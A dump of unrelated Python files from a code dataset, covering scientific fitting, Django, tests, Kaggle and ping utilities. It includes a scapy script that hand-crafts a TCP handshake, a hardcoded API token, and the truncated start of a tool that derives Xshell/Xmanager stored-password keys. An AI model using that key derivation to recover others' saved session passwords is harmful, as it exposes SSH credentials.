def testfun(molecule_index, *x):
print molecule_index
return molecule_index
def create_model(molecules, initial_parameters):
# Define priors for parameters.
model = dict()
parameters = dict() # just the parameters
for (key, value) in initial_parameters.iteritems():
(atomtype, parameter_name) = key.split('_')
if parameter_name == 'gamma':
stochastic = pymc.Uniform(key, value=value, lower=-10.0, upper=+10.0)
elif parameter_name == 'radius':
stochastic = pymc.Uniform(key, value=value, lower=1.0, upper=3.0)
else:
raise Exception("Unrecognized parameter name: %s" % parameter_name)
model[key] = stochastic
parameters[key] = stochastic
# Define deterministic functions for hydration free energies.
for (molecule_index, molecule) in enumerate(molecules):
molecule_name = molecule.GetTitle()
variable_name = "dg_gbvi_%08d" % molecule_index
# Determine which parameters are involved in this molecule to limit number of parents for caching.
parents = dict()
for atom in molecule.GetAtoms():
atomtype = atom.GetStringData("gbvi_type") # GBVI atomtype
for parameter_name in ['gamma', 'radius']:
stochastic_name = '%s_%s' % (atomtype,parameter_name)
parents[stochastic_name] = parameters[stochastic_name]
print "%s : " % molecule_name,
print parents.keys()
# Create deterministic variable for computed hydration free energy.
function = hydration_energy_factory(molecule)
model[variable_name] = pymc.Deterministic(eval=function,
name=variable_name,
parents=parents,
doc=molecule_name,
trace=True,
verbose=1,
dtype=float,
plot=False,
cache_depth=2)
# Define error model
log_sigma_min = math.log(0.01) # kcal/mol
log_sigma_max = math.log(10.0) # kcal/mol
log_sigma_guess = math.log(0.2) # kcal/mol
model['log_sigma'] = pymc.Uniform('log_sigma', lower=log_sigma_min, upper=log_sigma_max, value=log_sigma_guess)
model['sigma'] = pymc.Lambda('sigma', lambda log_sigma=model['log_sigma'] : math.exp(log_sigma) )
model['tau'] = pymc.Lambda('tau', lambda sigma=model['sigma'] : sigma**(-2) )
for (molecule_index, molecule) in enumerate(molecules):
molecule_name = molecule.GetTitle()
variable_name = "dg_exp_%08d" % molecule_index
dg_exp = float(OEGetSDData(molecule, 'dG(exp)')) # observed hydration free energy in kcal/mol
model[variable_name] = pymc.Normal(mu=model['dg_gbvi_%08d' % molecule_index], tau=model['tau'], value=dg_exp, observed=True)
return model
#=============================================================================================
# MAIN
#=============================================================================================
if __name__=="__main__":
# Create command-line argument options.
usage_string = """\
usage: %prog --types typefile --parameters paramfile --molecules molfile
example: %prog --types parameters/gbvi.types --parameters parameters/gbvi-am1bcc.parameters --molecules datasets/solvation.sdf --mcmcDb MCMC_db_name
"""
version_string = "%prog %__version__"
parser = OptionParser(usage=usage_string, version=version_string)
parser.add_option("-t", "--types", metavar='TYPES',
action="store", type="string", dest='atomtypes_filename', default='',
help="Filename defining atomtypes as SMARTS atom matches.")
parser.add_option("-p", "--parameters", metavar='PARAMETERS',
action="store", type="string", dest='parameters_filename', default='',
help="File containing initial parameter set.")
parser.add_option("-m", "--molecules", metavar='MOLECULES',
action="store", type="string", dest='molecules_filename', default='',
help="Small molecule set (in any OpenEye compatible file format) containing 'dG(exp)' fields with experimental hydration free energies.")
parser.add_option("-d", "--mcmcDb", metavar='MCMC_Db',
action="store", type="string", dest='mcmcDb', default='',
help="MCMC db name.")
# Parse command-line arguments.
(options,args) = parser.parse_args()
# Ensure all required options have been specified.
if options.atomtypes_filename=='' or options.parameters_filename=='' or options.molecules_filename=='' or options.mcmcDb == '':
parser.print_help()
parser.error("All input files must be specified.")
# Read GBVI parameters.
parameters = read_gbvi_parameters(options.parameters_filename)
mcmcDbName = options.mcmcDb
printString = "Starting " + sys.argv[0] + "\n"
printString += ' atom types=<' + options.atomtypes_filename + ">\n"
printString += ' parameters=<' + options.parameters_filename + ">\n"
printString += ' molecule=<' + options.molecules_filename + ">\n"
printString += ' mcmcDB=<' + options.mcmcDb + ">\n"
sys.stderr.write( printString )
sys.stdout.write( printString )
# Construct atom typer.
atom_typer = AtomTyper(options.atomtypes_filename, "gbvi_type")
# Load and type all molecules in the specified dataset.
print "Loading and typing all molecules in dataset..."
start_time = time.time()
molecules = list()
input_molstream = oemolistream(options.molecules_filename)
molecule = OECreateOEGraphMol()
while OEReadMolecule(input_molstream, molecule):
# Get molecule name.
name = OEGetSDData(molecule, 'name').strip()
molecule.SetTitle(name)
# Append to list.
molecule_copy = OEMol(molecule)
molecules.append(molecule_copy)
input_molstream.close()
print "%d molecules read" % len(molecules)
end_time = time.time()
elapsed_time = end_time - start_time
print "%.3f s elapsed" % elapsed_time
# Add explicit hydrogens.
for molecule in molecules:
openeye.oechem.OEAddExplicitHydrogens(molecule)
# Build a conformation for all molecules with Omega.
print "Building conformations for all molecules..."
import openeye.oeomega
omega = openeye.oeomega.OEOmega()
omega.SetMaxConfs(1)
omega.SetFromCT(True)
for molecule in molecules:
#omega.SetFixMol(molecule)
omega(molecule)
end_time = time.time()
elapsed_time = end_time - start_time
print "%.3f s elapsed" % elapsed_time
# Regularize all molecules through writing as mol2.
print "Regularizing all molecules..."
ligand_mol2_dirname = os.path.dirname(mcmcDbName) + '/mol2'
if( not os.path.exists( ligand_mol2_dirname ) ):
os.makedirs(ligand_mol2_dirname)
ligand_mol2_filename = ligand_mol2_dirname + '/temp' + os.path.basename(mcmcDbName) + '.mol2'
start_time = time.time()
omolstream = openeye.oechem.oemolostream(ligand_mol2_filename)
for molecule in molecules:
# Write molecule as mol2, changing molecule through normalization.
openeye.oechem.OEWriteMolecule(omolstream, molecule)
omolstream.close()
end_time = time.time()
elapsed_time = end_time - start_time
print "%.3f s elapsed" % elapsed_time
# Assign AM1-BCC charges.
print "Assigning AM1-BCC charges..."
start_time = time.time()
for molecule in molecules:
# Assign AM1-BCC charges.
if molecule.NumAtoms() == 1:
# Use formal charges for ions.
OEFormalPartialCharges(molecule)
else:
# Assign AM1-BCC charges for multiatom molecules.
OEAssignPartialCharges(molecule, OECharges_AM1BCC, False) # use explicit hydrogens
# Check to make sure we ended up with partial charges.
if OEHasPartialCharges(molecule) == False:
print "No charges on molecule: '%s'" % molecule.GetTitle()
print "IUPAC name: %s" % OECreateIUPACName(molecule)
# TODO: Write molecule out
# Delete themolecule.
molecules.remove(molecule)
end_time = time.time()
elapsed_time = end_time - start_time
print "%.3f s elapsed" % elapsed_time
print "%d molecules remaining" % len(molecules)
# Type all molecules with GAFF parameters.
start_time = time.time()
typed_molecules = list()
untyped_molecules = list()
for molecule in molecules:
# Assign GBVI types according to SMARTS rules.
try:
atom_typer.assignTypes(molecule)
typed_molecules.append(OEGraphMol(molecule))
#atom_typer.debugTypes(molecule)
except AtomTyper.TypingException as exception:
print name
print exception
untyped_molecules.append(OEGraphMol(molecule))
end_time = time.time()
elapsed_time = end_time - start_time
print "%d molecules correctly typed" % (len(typed_molecules))
print "%d molecules missing some types" % (len(untyped_molecules))
print "%.3f s elapsed" % elapsed_time
# Load updated parameter sets.
parameter_sets = list()
for key in parameters.keys():
# Read parameters.
filename = mcmcDbName + '.txt/Chain_0/%s.txt' % key
print "Parameter %s from file %s" %( key, filename )
infile = open(filename, 'r')
lines = infile.readlines()
infile.close()
# Discard header
lines = lines[3:]
# Insert parameter.
for (index, line) in enumerate(lines):
elements = line.split()
parameter = float(elements[0])
try:
parameter_sets[index][key] = parameter
except Exception:
parameter_sets.append( dict() )
parameter_sets[index][key] = parameter
for (index, parameter_set) in enumerate([parameters] + parameter_sets): # skip some
#for (index, parameter_set) in enumerate([parameters] + parameter_sets[::10]): # skip some
# Compute energies with all molecules.
print "Computing all energies..."
start_time = time.time()
energies = compute_hydration_energies(typed_molecules, parameter_set)
#energies = compute_hydration_energies_parallel(typed_molecules, parameter_set)
end_time = time.time()
elapsed_time = end_time - start_time
print "%.3f s elapsed" % elapsed_time
# # Print comparison.
# for molecule in typed_molecules:
# # Get metadata.
# name = OEGetSDData(molecule, 'name').strip()
# dg_exp = float(OEGetSDData(molecule, 'dG(exp)')) * units.kilocalories_per_mole
# # Form output.
# outstring = "%48s %8.3f %8.3f" % (name, dg_exp / units.kilocalories_per_mole, energies[molecule] / units.kilocalories_per_mole)
# print outstring
# Print summary statistics.
signed_errors = numpy.zeros([len(typed_molecules)], numpy.float64)
for (i, molecule) in enumerate(typed_molecules):
# Get metadata.
name = OEGetSDData(molecule, 'name').strip()
energy = energies[molecule] / units.kilocalories_per_mole
if( math.isnan(energy) ):
print "%5d dG: nan %8.3f %s" % (i, dg_exp / units.kilocalories_per_mole, name)
else:
try:
dg_exp = float(OEGetSDData(molecule, 'dG(exp)')) * units.kilocalories_per_mole
signed_errors[i] = energies[molecule] / units.kilocalories_per_mole - dg_exp / units.kilocalories_per_mole
except:
print "Problem getting dG(exp) for molecule %d %s" % (i, name)
print "iteration %8d : RMS error %8.3f kcal/mol" % (index, signed_errors.std())
|
7,168 | 7e328992392a4ff2b0e23920a8907e38f63fcff0 | from django.contrib import admin
from .models import Game, Scrap
admin.site.register(Game)
admin.site.register(Scrap)
|
7,169 | acd6197e60cf59ffcaa33bb50a60a03592bb3559 | #! /usr/bin/python3
from scapy.all import *
import sys
ip=IP(src=sys.argv[1], dst=sys.argv[2])
syn_packet = TCP(sport=52255, dport=1237, flags="S", seq=100, options=[('MSS',689),('WScale',1)])
synack_packet = sr1(ip/syn_packet)
my_ack = synack_packet.seq+1
ack_packet = TCP(sport=52255, dport=1237, flags="A", seq=101, ack=my_ack)
send(ip/ack_packet)
|
7,170 | 3941f283893c259033d7fb3be83c8071433064ba | from output.models.nist_data.list_pkg.nmtokens.schema_instance.nistschema_sv_iv_list_nmtokens_min_length_5_xsd.nistschema_sv_iv_list_nmtokens_min_length_5 import NistschemaSvIvListNmtokensMinLength5
obj = NistschemaSvIvListNmtokensMinLength5(
value=[
"f",
"D",
"T",
"a",
"b",
"C",
"o",
"t",
"t",
"w",
]
)
|
7,171 | 7700e3c4061f0e81a1dea8fa8b27a0380fc26e71 | #!/usr/bin/env python
#
# Copyright (C) University College London, 2007-2012, all rights reserved.
#
# This file is part of HemeLB and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#
# encoding: utf-8
"""
test_machine_environment.py
Created by James Hetherington on 2012-01-19.
Copyright (c) 2012 UCL. All rights reserved.
"""
import unittest
import sys
import copy
import textwrap
from ..fab import *
class TestFabric(unittest.TestCase):
def setUp(self):
#Update the user config with testing example
env.test_home=os.path.join(env.localroot,'deploy','test')
user_config=yaml.load(open(os.path.join(env.localroot,'deploy','test','machines_user.yml')))
env.update(user_config['default'])
execute(planck) #Default machine target is assumed as planck.
#Monkeypatch the fabric commands to do nothing, but record what they would have done
sys.modules['deploy.fab'].run=lambda command: self.commands.append(command)
def mock_local(command,original=sys.modules['deploy.fab'].local):
self.commands.append(command)
original(command)
sys.modules['deploy.fab'].local=mock_local
sys.modules['deploy.fab'].put=lambda source,target: self.commands.append("put "+source+" "+target)
sys.modules['deploy.fab'].rsync_project=lambda **args: self.commands.append("rsync "+args['local_dir']+" "+args['remote_dir'])
def mock_profile(profile,original=sys.modules['deploy.fab'].generate):
self.commands.append("generate %g %g %g"%(profile.VoxelSize, profile.Steps , profile.Cycles) )
original(profile)
sys.modules['deploy.fab'].generate=mock_profile
self.commands=[]
env.build_number='abcd1234'
def assertCommandCount(self,should_be):
self.assertEqual(len(self.commands),should_be)
def assertCommand(self,should_be,index=-1):
self.assertEqual(self.commands[index],should_be)
def assertCommandRegexp(self,should_be,index=-1):
self.assertRegexpMatches(self.commands[index],should_be)
def test_machine_alias(self):
self.assertEqual(env.remote,"planck.chem.ucl.ac.uk")
execute(julian)
self.assertEqual(env.remote,"julian.chem.ucl.ac.uk")
execute(hector)
self.assertEqual(env.remote,"login.hector.ac.uk")
def test_clean(self):
execute(clean)
self.assertCommand('make clean')
def test_with_job(self):
with settings(results_path="banana",local_results='pineapple'):
with_job('foo')
self.assertEqual(env.job_results,"banana/foo")
self.assertEqual(env.job_results_local,"pineapple/foo")
def test_with_template_job(self):
with settings(results_path='banana',foo='fish',bar='swim',job_name_template="${foo}_${bar}"):
with_template_job()
self.assertEqual(env.job_results,"banana/fish_swim")
def test_hemelb(self):
execute(hemelb,'cylinder',cores=5)
self.assertEqual(env.name,"cylinder_abcd1234_planck_5_10_10")
self.assertCommandRegexp('mkdir -p .*config_files/cylinder',0)
self.assertCommandRegexp('rsync .*config_files/cylinder',1)
self.assertCommandRegexp("put .*scripts/cylinder_abcd1234_planck_5_10_10.sh",2)
self.assertCommandRegexp("mkdir -p .*results/cylinder_abcd1234_planck_5_10_10",3)
self.assertCommandRegexp("cp .*scripts/cylinder_abcd1234_planck_5_10_10.sh .*results/cylinder_abcd1234_planck_5_10_10",4)
self.assertCommandRegexp("cp .*CMakeCache.txt .*results/cylinder_abcd1234_planck_5_10_10",5)
self.assertCommandRegexp("put .*env.yml",6)
self.assertCommandRegexp("chmod u\+x .*scripts/cylinder_abcd1234_planck_5_10_10.sh",7)
self.assertCommandRegexp(".*scripts/cylinder_abcd1234_planck_5_10_10.sh",8)
self.assertCommandCount(9)
def test_hemelbs(self):
execute(hemelbs,'cylinder',cores='[1:6:1]')
self.assertCommandRegexp('rsync .*config_files/cylinder',1)
self.assertCommandRegexp("cylinder_abcd1234_planck_5_10_10.sh")
self.assertCommandCount(9*5)
def test_create_config(self):
execute(create_config,'cylinder',VoxelSize=0.1)
self.assertEqual(env.config,"cylinder_0_1_1000_3")
self.assertCommandRegexp("mkdir -p .*/configs/cylinder_0_1_1000_3",0)
self.assertCommand("generate 0.1 1000 3",1)
self.assertCommandCount(2)
def test_create_configs(self):
execute(create_configs,'cylinder',VoxelSize='[0.1:0.21:0.01]')
self.assertEqual(env.config,"cylinder_0_2_1000_3")
self.assertCommandRegexp("mkdir -p .*/configs/cylinder_0_1_1000_3",0)
self.assertCommand("generate 0.1 1000 3",1)
self.assertCommandCount(2*11)
def test_hemelb_profile(self):
execute(hemelb_profile,'cylinder',VoxelSize='[0.1:0.21:0.01]',cores='[1:6:1]')
self.assertEqual(env.name,"cylinder_0_2_1000_3_abcd1234_planck_5_10_10")
self.assertCommandRegexp("mkdir -p .*/configs/cylinder_0_1_1000_3",0)
self.assertCommand("generate 0.1 1000 3",1)
self.assertCommandRegexp('mkdir -p .*config_files/cylinder',2)
self.assertCommandRegexp('rsync .*config_files/cylinder',3)
self.assertCommandRegexp("put .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",4)
self.assertCommandRegexp("mkdir -p .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",5)
self.assertCommandRegexp("cp .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",6)
self.assertCommandRegexp("cp .*CMakeCache.txt .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",7)
self.assertCommandRegexp("put .*env.yml",8)
self.assertCommandRegexp("chmod u\+x .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",9)
self.assertCommandRegexp(".*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",10)
self.assertCommandCount(2*11 + 9*11*5)
def test_hemelb_profile_no_config_generation(self):
execute(hemelb_profile,'cylinder',VoxelSize='[0.1:0.21:0.01]',cores='[1:6:1]',create_configs="False")
self.assertEqual(env.name,"cylinder_0_2_1000_3_abcd1234_planck_5_10_10")
self.assertCommandRegexp('mkdir -p .*config_files/cylinder',0)
self.assertCommandRegexp('rsync .*config_files/cylinder',1)
self.assertCommandRegexp("put .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",2)
self.assertCommandRegexp("mkdir -p .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",3)
self.assertCommandRegexp("cp .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",4)
self.assertCommandRegexp("cp .*CMakeCache.txt .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",5)
self.assertCommandRegexp("put .*env.yml",6)
self.assertCommandRegexp("chmod u\+x .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",7)
self.assertCommandRegexp(".*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",8)
self.assertCommandCount(9*11*5)
def test_configure_default(self):
execute(configure)
target={
'CMAKE_BUILD_TYPE': "Release",
'CMAKE_CXX_FLAGS_RELEASE': "-O4",
'CMAKE_INSTALL_PREFIX': env.install_path,
'CPPUNIT_PATCH_LDL' : True,
"HEMELB_DEPENDENCIES_INSTALL_PATH": env.install_path,
"HEMELB_SUBPROJECT_MAKE_JOBS": 1
}
self.assertEqual(env.total_cmake_options,target)
#Can't just assert on a string here, as the order of the dict is not defined
for key,value in target.iteritems():
self.assertRegexpMatches(env.cmake_flags,"-D%s=%s"%(key,value))
def test_configure_debug(self):
execute(configure,'debug')
self.assertEqual(env.total_cmake_options,
{
'CMAKE_BUILD_TYPE': "Debug",
'HEMELB_OPTIMISATION': "",
'HEMELB_LOG_LEVEL': "debug",
'CPPUNIT_PATCH_LDL' : True,
'CMAKE_INSTALL_PREFIX': env.install_path,
"HEMELB_DEPENDENCIES_INSTALL_PATH": env.install_path,
"HEMELB_SUBPROJECT_MAKE_JOBS": 1
})
def test_script_template(self):
script=script_templates('dummy_ge_header','dummy_jobscript',commands=['extra'])
content=open(script).read()
self.assertEqual(content,"user: test_user\n\nrun bananas\n\nextra") |
7,172 | a6365104125725f11010c35eb0781c941de803f8 | import pandas
import evaluation
import sys
sys.path.append('D:\\libs\\xgboost\\wrapper')
import xgboost as xgb
# Read training data
folder = '../data/'
train = pandas.read_csv(folder + 'training.csv', index_col='id')
# Define features to drop from train data
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal', 'SPDhits', 'IP', 'IPSig', ]
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
# 'SPDhits', 'p0_p', 'p1_p', 'p2_p', 'p0_eta', 'p1_eta', 'p2_eta', ]
variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
'SPDhits', ]
# Train xgb model on train data
train_X = train.drop(variables_to_drop, 1).values
train_y = train['signal'].values
xg_train = xgb.DMatrix(train_X, label=train_y)
# params = {'silent': 1, 'nthread': 2, 'objective': 'binary:logistic', 'eval_metric': 'auc',
# 'max_depth': 6, 'eta': 0.3}
params = {'objective': 'binary:logistic',
'eta': 0.3,
'max_depth': 5,
'min_child_weight': 3,
'silent': 1,
'subsample': 0.7,
'colsample_bytree': 0.7,
'seed': 1,
'nthread': 2}
num_trees = 250
n_rounds = 120
watchlist = [(xg_train, 'train')]
xgb_model = xgb.train(params, xg_train, num_trees, watchlist)
# xgb_model = xgb.train(params, xg_train, n_rounds, watchlist)
# Check agreement test
check_agreement = pandas.read_csv(folder + 'check_agreement.csv', index_col='id')
xg_check_agreement = xgb.DMatrix(check_agreement.values)
agreement_probs = xgb_model.predict(xg_check_agreement)
ks = evaluation.compute_ks(
agreement_probs[check_agreement['signal'].values == 0],
agreement_probs[check_agreement['signal'].values == 1],
check_agreement[check_agreement['signal'] == 0]['weight'].values,
check_agreement[check_agreement['signal'] == 1]['weight'].values)
print 'KS metric', ks, ks < 0.09
# Check correlation test
check_correlation = pandas.read_csv(folder + 'check_correlation.csv', index_col='id')
xg_check_correlation = xgb.DMatrix(check_correlation.values)
correlation_probs = xgb_model.predict(xg_check_correlation)
cvm = evaluation.compute_cvm(correlation_probs, check_correlation['mass'])
print 'CvM metric', cvm, cvm < 0.002
# Compute weighted AUC on the training data with min_ANNmuon > 0.4
train_eval = train[train['min_ANNmuon'] > 0.4]
train_eval_X = train_eval.drop(variables_to_drop, 1).values
xg_train_eval = xgb.DMatrix(train_eval_X)
train_probs = xgb_model.predict(xg_train_eval)
AUC = evaluation.roc_auc_truncated(train_eval['signal'], train_probs)
print 'AUC', AUC
# Predict test, create file for kaggle
test = pandas.read_csv(folder + 'test.csv', index_col='id')
test_X = test.values
xg_test = xgb.DMatrix(test_X)
result = pandas.DataFrame({'id': test.index})
result['prediction'] = xgb_model.predict(xg_test)
result.to_csv('../submissions/xgb.csv', index=False, sep=',')
|
7,173 | 8419aee5dbc64b51f3c0f364716aad1630f00fe9 | import sys, os, json
sys.path.append(os.path.join(os.path.dirname(__file__), "requests"))
import requests
def findNonPrefixes(prefix, array):
result = []
prefixLength = len(prefix)
for string in array:
if string[0:prefixLength] != prefix:
result.append(string)
return result
def run ():
r = requests.post("http://challenge.code2040.org/api/prefix", data={'token': '747bece10e7785955b91c15de7435216'})
result = r.json()
prefix = result["prefix"]
stringArray = result["array"]
resultArray = findNonPrefixes(prefix, stringArray)
headers = {'Content-Type': 'application/json', 'Accept':'application/json'}
payload = {'token': '747bece10e7785955b91c15de7435216', 'array': resultArray}
r2 = requests.post("http://challenge.code2040.org/api/prefix/validate", data=json.dumps(payload), headers = headers)
run() |
7,174 | ae8add3adc336c9404cd2aeab4aff81c94c8884e | from django.contrib.auth.forms import UserChangeForm
from django.contrib.auth.models import User
from django import forms
class editForm(forms.ModelForm):
username = forms.CharField(max_length=100, widget= forms.TextInput(attrs={'class': 'form-control'}))
first_name = forms.CharField(max_length=100, widget= forms.TextInput(attrs={'class': 'form-control'}))
last_name = forms.CharField(max_length=100, widget= forms.TextInput(attrs={'class': 'form-control'}))
email = forms.EmailField(widget= forms.EmailInput(attrs={'class': 'form-control'}))
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email') |
7,175 | 892f90edbd8bd54841b815a6bc29d136c5e84a38 | # This defines a new interface, called MyClosedInterface
# which is closed (does not allow new members to be added).
# "eci" is the schema id for this extension.
{"fs": { "eci": {
"info": {
"name": "Example closed Interface extension",
"version": "1.0",
"date": "Sept. 22, 2016",
"author": "Jeff Teeters",
"contact": "jteeters@berkeley.edu",
"description": ("Extension defining a new closed Interface")
},
"schema": {
"MyClosedInterface/": {
"merge": ["core:<Interface>/"],
"description": ("A new interface defined in extension e-closed-interface.py."
" This is closed (no new members can be added)."),
"_properties": {"closed": True}, # specify that this group is closed (no new members can be added).
"attributes": {
"foo": {
"description": "example text attributed for MyClosedInterface",
"data_type": "text"}},
"bar": {
"description": ("Example dataset included with MyClosedInterface"),
"data_type": "int",
"dimensions": ["num_measurements"]},
"bazc/": {
"description": ("Example closed group in MyClosedInterface"),
# "_closed": True,
"_properties": {"closed": True}},
"bazo/": {
"description": ("Example open group in MyClosedInterface"),
# "_closed": False,
"_properties": {"closed": False}}
}
}
}}}
|
7,176 | 3f2221f5f3a699020dd5986acb793e3083976dff | import subprocess
import datetime
def ping_address(host,n):
ping = subprocess.Popen(
["ping","-c",str(n),host],
stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
out,error = ping.communicate()
return out, error
def ping_address_windows(host,n):
ping = subprocess.Popen(
["ping","-n",str(n),host], # Need -c for linux
stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
out,error = ping.communicate()
return out, error
def parse_msg(msg):
line_org = msg.split('\n')
N = len(line_org)-2
line = line_org[N]
return line
def get_vals(msg):
rhs = msg.split('=')
try:
nums = rhs[1].split('/')
min_num = float(nums[0])
ave_num = float(nums[1])
max_num = float(nums[2])
std_num = nums[3].split(' ')
std_num = float(std_num[0])
except:
print("Could not Ping Website...")
min_num = float('nan')
ave_num = float('nan')
max_num = float('nan')
std_num = float('nan')
return min_num, ave_num, max_num, std_num
def get_vals_windows(msg):
rhs = msg.split('=')
try:
nums = rhs[1].split('ms')
min_num = float(nums[0])
nums = rhs[2].split('ms')
ave_num = float(nums[0])
nums = rhs[3].split('ms')
max_num = float(nums[0])
std_num = float('nan')
except:
print("Could not Ping Website...")
min_num = float('nan')
ave_num = float('nan')
max_num = float('nan')
std_num = float('nan')
return min_num, ave_num, max_num, std_num
def get_date_and_time():
return datetime.datetime.now()
|
7,177 | 6027836b1b5d3cb8b842b1a1b77f5c9777269896 | """
ะ ะผะฐััะธะฒะต ัะปััะฐะนะฝัั
ัะตะปัั
ัะธัะตะป ะฟะพะผะตะฝััั ะผะตััะฐะผะธ ะผะธะฝะธะผะฐะปัะฝัะน ะธ ะผะฐะบัะธะผะฐะปัะฝัะน ัะปะตะผะตะฝัั.
"""
import random
SIZE = 10
MIN_ITEM = -100
MAX_ITEM = 100
array = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)]
print('ะะฐััะธะฒ ัะปััะฐะนะฝัั
ัะธัะตะป:\n', array)
min_el = array[0]
max_el = array[0]
max_el_inx = 0
min_el_inx = 0
for el in range(SIZE):
if array[el] > max_el:
max_el = array[el]
max_el_inx = el
if array[el] < min_el:
min_el = array[el]
min_el_inx = el
print('ะะธะฝะธะผะฐะปัะฝัะน ะธ ะผะฐะบัะธะผะฐะปัะฝัะน ัะปะตะผะตะฝัั ะผะฐััะธะฒะฐ:\n', min_el, 'ะธ', max_el)
array.pop(min_el_inx)
array.insert(min_el_inx, max_el)
array.pop(max_el_inx)
array.insert(max_el_inx, min_el)
print('ะะฐััะธะฒ, ะฒ ะบะพััะพะผ ะฟะพะผะตะฝัะฝั ะผะตััะฐะผะธ ะผะธะฝะธะผะฐะปัะฝัะน ะธ ะผะฐะบัะธะผะฐะปัะฝัะน ัะปะตะผะตะฝัั:\n', array)
|
7,178 | 962a9781e4f2ad787dd695896b6455c9b336603a | from core import Postgresdb
db = Postgresdb()
print(db) |
7,179 | 03677f02473019fcc6a40d91569a85be78ca0a87 | #!/usr/bin/env python3
from datetime import datetime
import re
import sys
MONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'
'January|February|March|April|June|July|August|September|October|November|December')
re_entry_begin = re.compile(r'(?P<version>[\d.]+)[ :]*\(?(?P<date>\d\d\d\d-\d\d-\d\d|(?:'
+ MONTHS_REGEXP + r') \d\d, \d\d\d\d)?\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = ' -- Paul Morelle <paul@scengrafics.com> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n'
# Missing from CHANGELOG (found in hg log), or not parseable easily
VERSION_DATES = {
'1.2.8': '2008-08-22',
'1.2.7': '2007-01-07',
'1.2.2': '2005-05-06',
'1.2.1': '2004-04-04',
'1.1.1': '2004-02-01',
'1.1': '2004-01-30',
'0.4': '2003-11-04',
'0.1': '2003-05-19',
}
first_line_met = False
current_date = None
last_line_blank = False
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith(r'\* *This Change Log was')
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
|
7,180 | 1330addd53c6187a41dfea6957bf47aaecca1135 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-27 21:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
dependencies = [
('regions', '0002_auto_20171024_1707'),
]
operations = [
migrations.AlterField(
model_name='region',
name='email',
field=models.EmailField(max_length=100, null=True, verbose_name='email'),
),
migrations.AlterField(
model_name='region',
name='governor',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='public_servants.PublicServant', verbose_name='governor'),
),
migrations.AlterField(
model_name='region',
name='phone',
field=phonenumber_field.modelfields.PhoneNumberField(max_length=128, null=True, verbose_name='phone'),
),
migrations.AlterField(
model_name='region',
name='twitter',
field=models.CharField(blank=True, max_length=50, null=True),
),
]
|
7,181 | 5f2427c077d460d109f5a3e94b93f72c090f036d | # -*- coding: utf-8 -*-
# python >= 3.7
# supported xmanager version <5.1, 5.1, 5.2, 6
import os
import argparse
import configparser
import unicodedata
from win32api import GetComputerName, GetUserName
from win32security import LookupAccountName, ConvertSidToStringSid
from base64 import b64encode, b64decode
from Cryptodome.Hash import MD5, SHA256
from Cryptodome.Cipher import ARC4
USERNAME = GetUserName()
MASTER_PWD = None
SID = ConvertSidToStringSid(LookupAccountName(GetComputerName(), GetUserName())[0])
IS_XSH = True
VERSION = '5.2'
KEY = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang\Xshell\Sessions")
IS_DECRYPT = True
def getCipherKey():
if not is_number(VERSION):
raise ValueError('Invalid argument: --Version')
ver = float(VERSION)
if 0 < ver and ver < 5.1:
if IS_XSH:
return MD5.new(b'!X@s#h$e%l^l&').digest()
else:
return MD5.new(b'!X@s#c$e%l^l&').digest()
elif 5.1 <= ver and ver <= 5.2:
return SHA256.new(SID.encode()).digest()
elif 5.2 < ver:
if MASTER_PWD == None:
return SHA256.new((USERNAME + SID).encode()).digest()
else:
return SHA256.new(MASTER_PWD.encode()).digest()
else:
raise ValueError('Invalid argument: --Version')
def encrypt_string(password_string, need_return=False):
if not is_number(VERSION):
raise ValueError('Invalid argument: --Version')
ver = float(VERSION)
Cipher = ARC4.new(getCipherKey())
if ver < 5.1:
en_password = b64encode(Cipher.encrypt(password_string.encode())).decode()
else:
checksum = SHA256.new(password_string.encode()).digest()
ciphertext = Cipher.encrypt(password_string.encode())
en_password = b64encode(ciphertext + checksum).decode()
if need_return:
return en_password
else:
print('%-20s : %s' % ('Version', VERSION))
print('%-20s : %s' % ('Password', password_string))
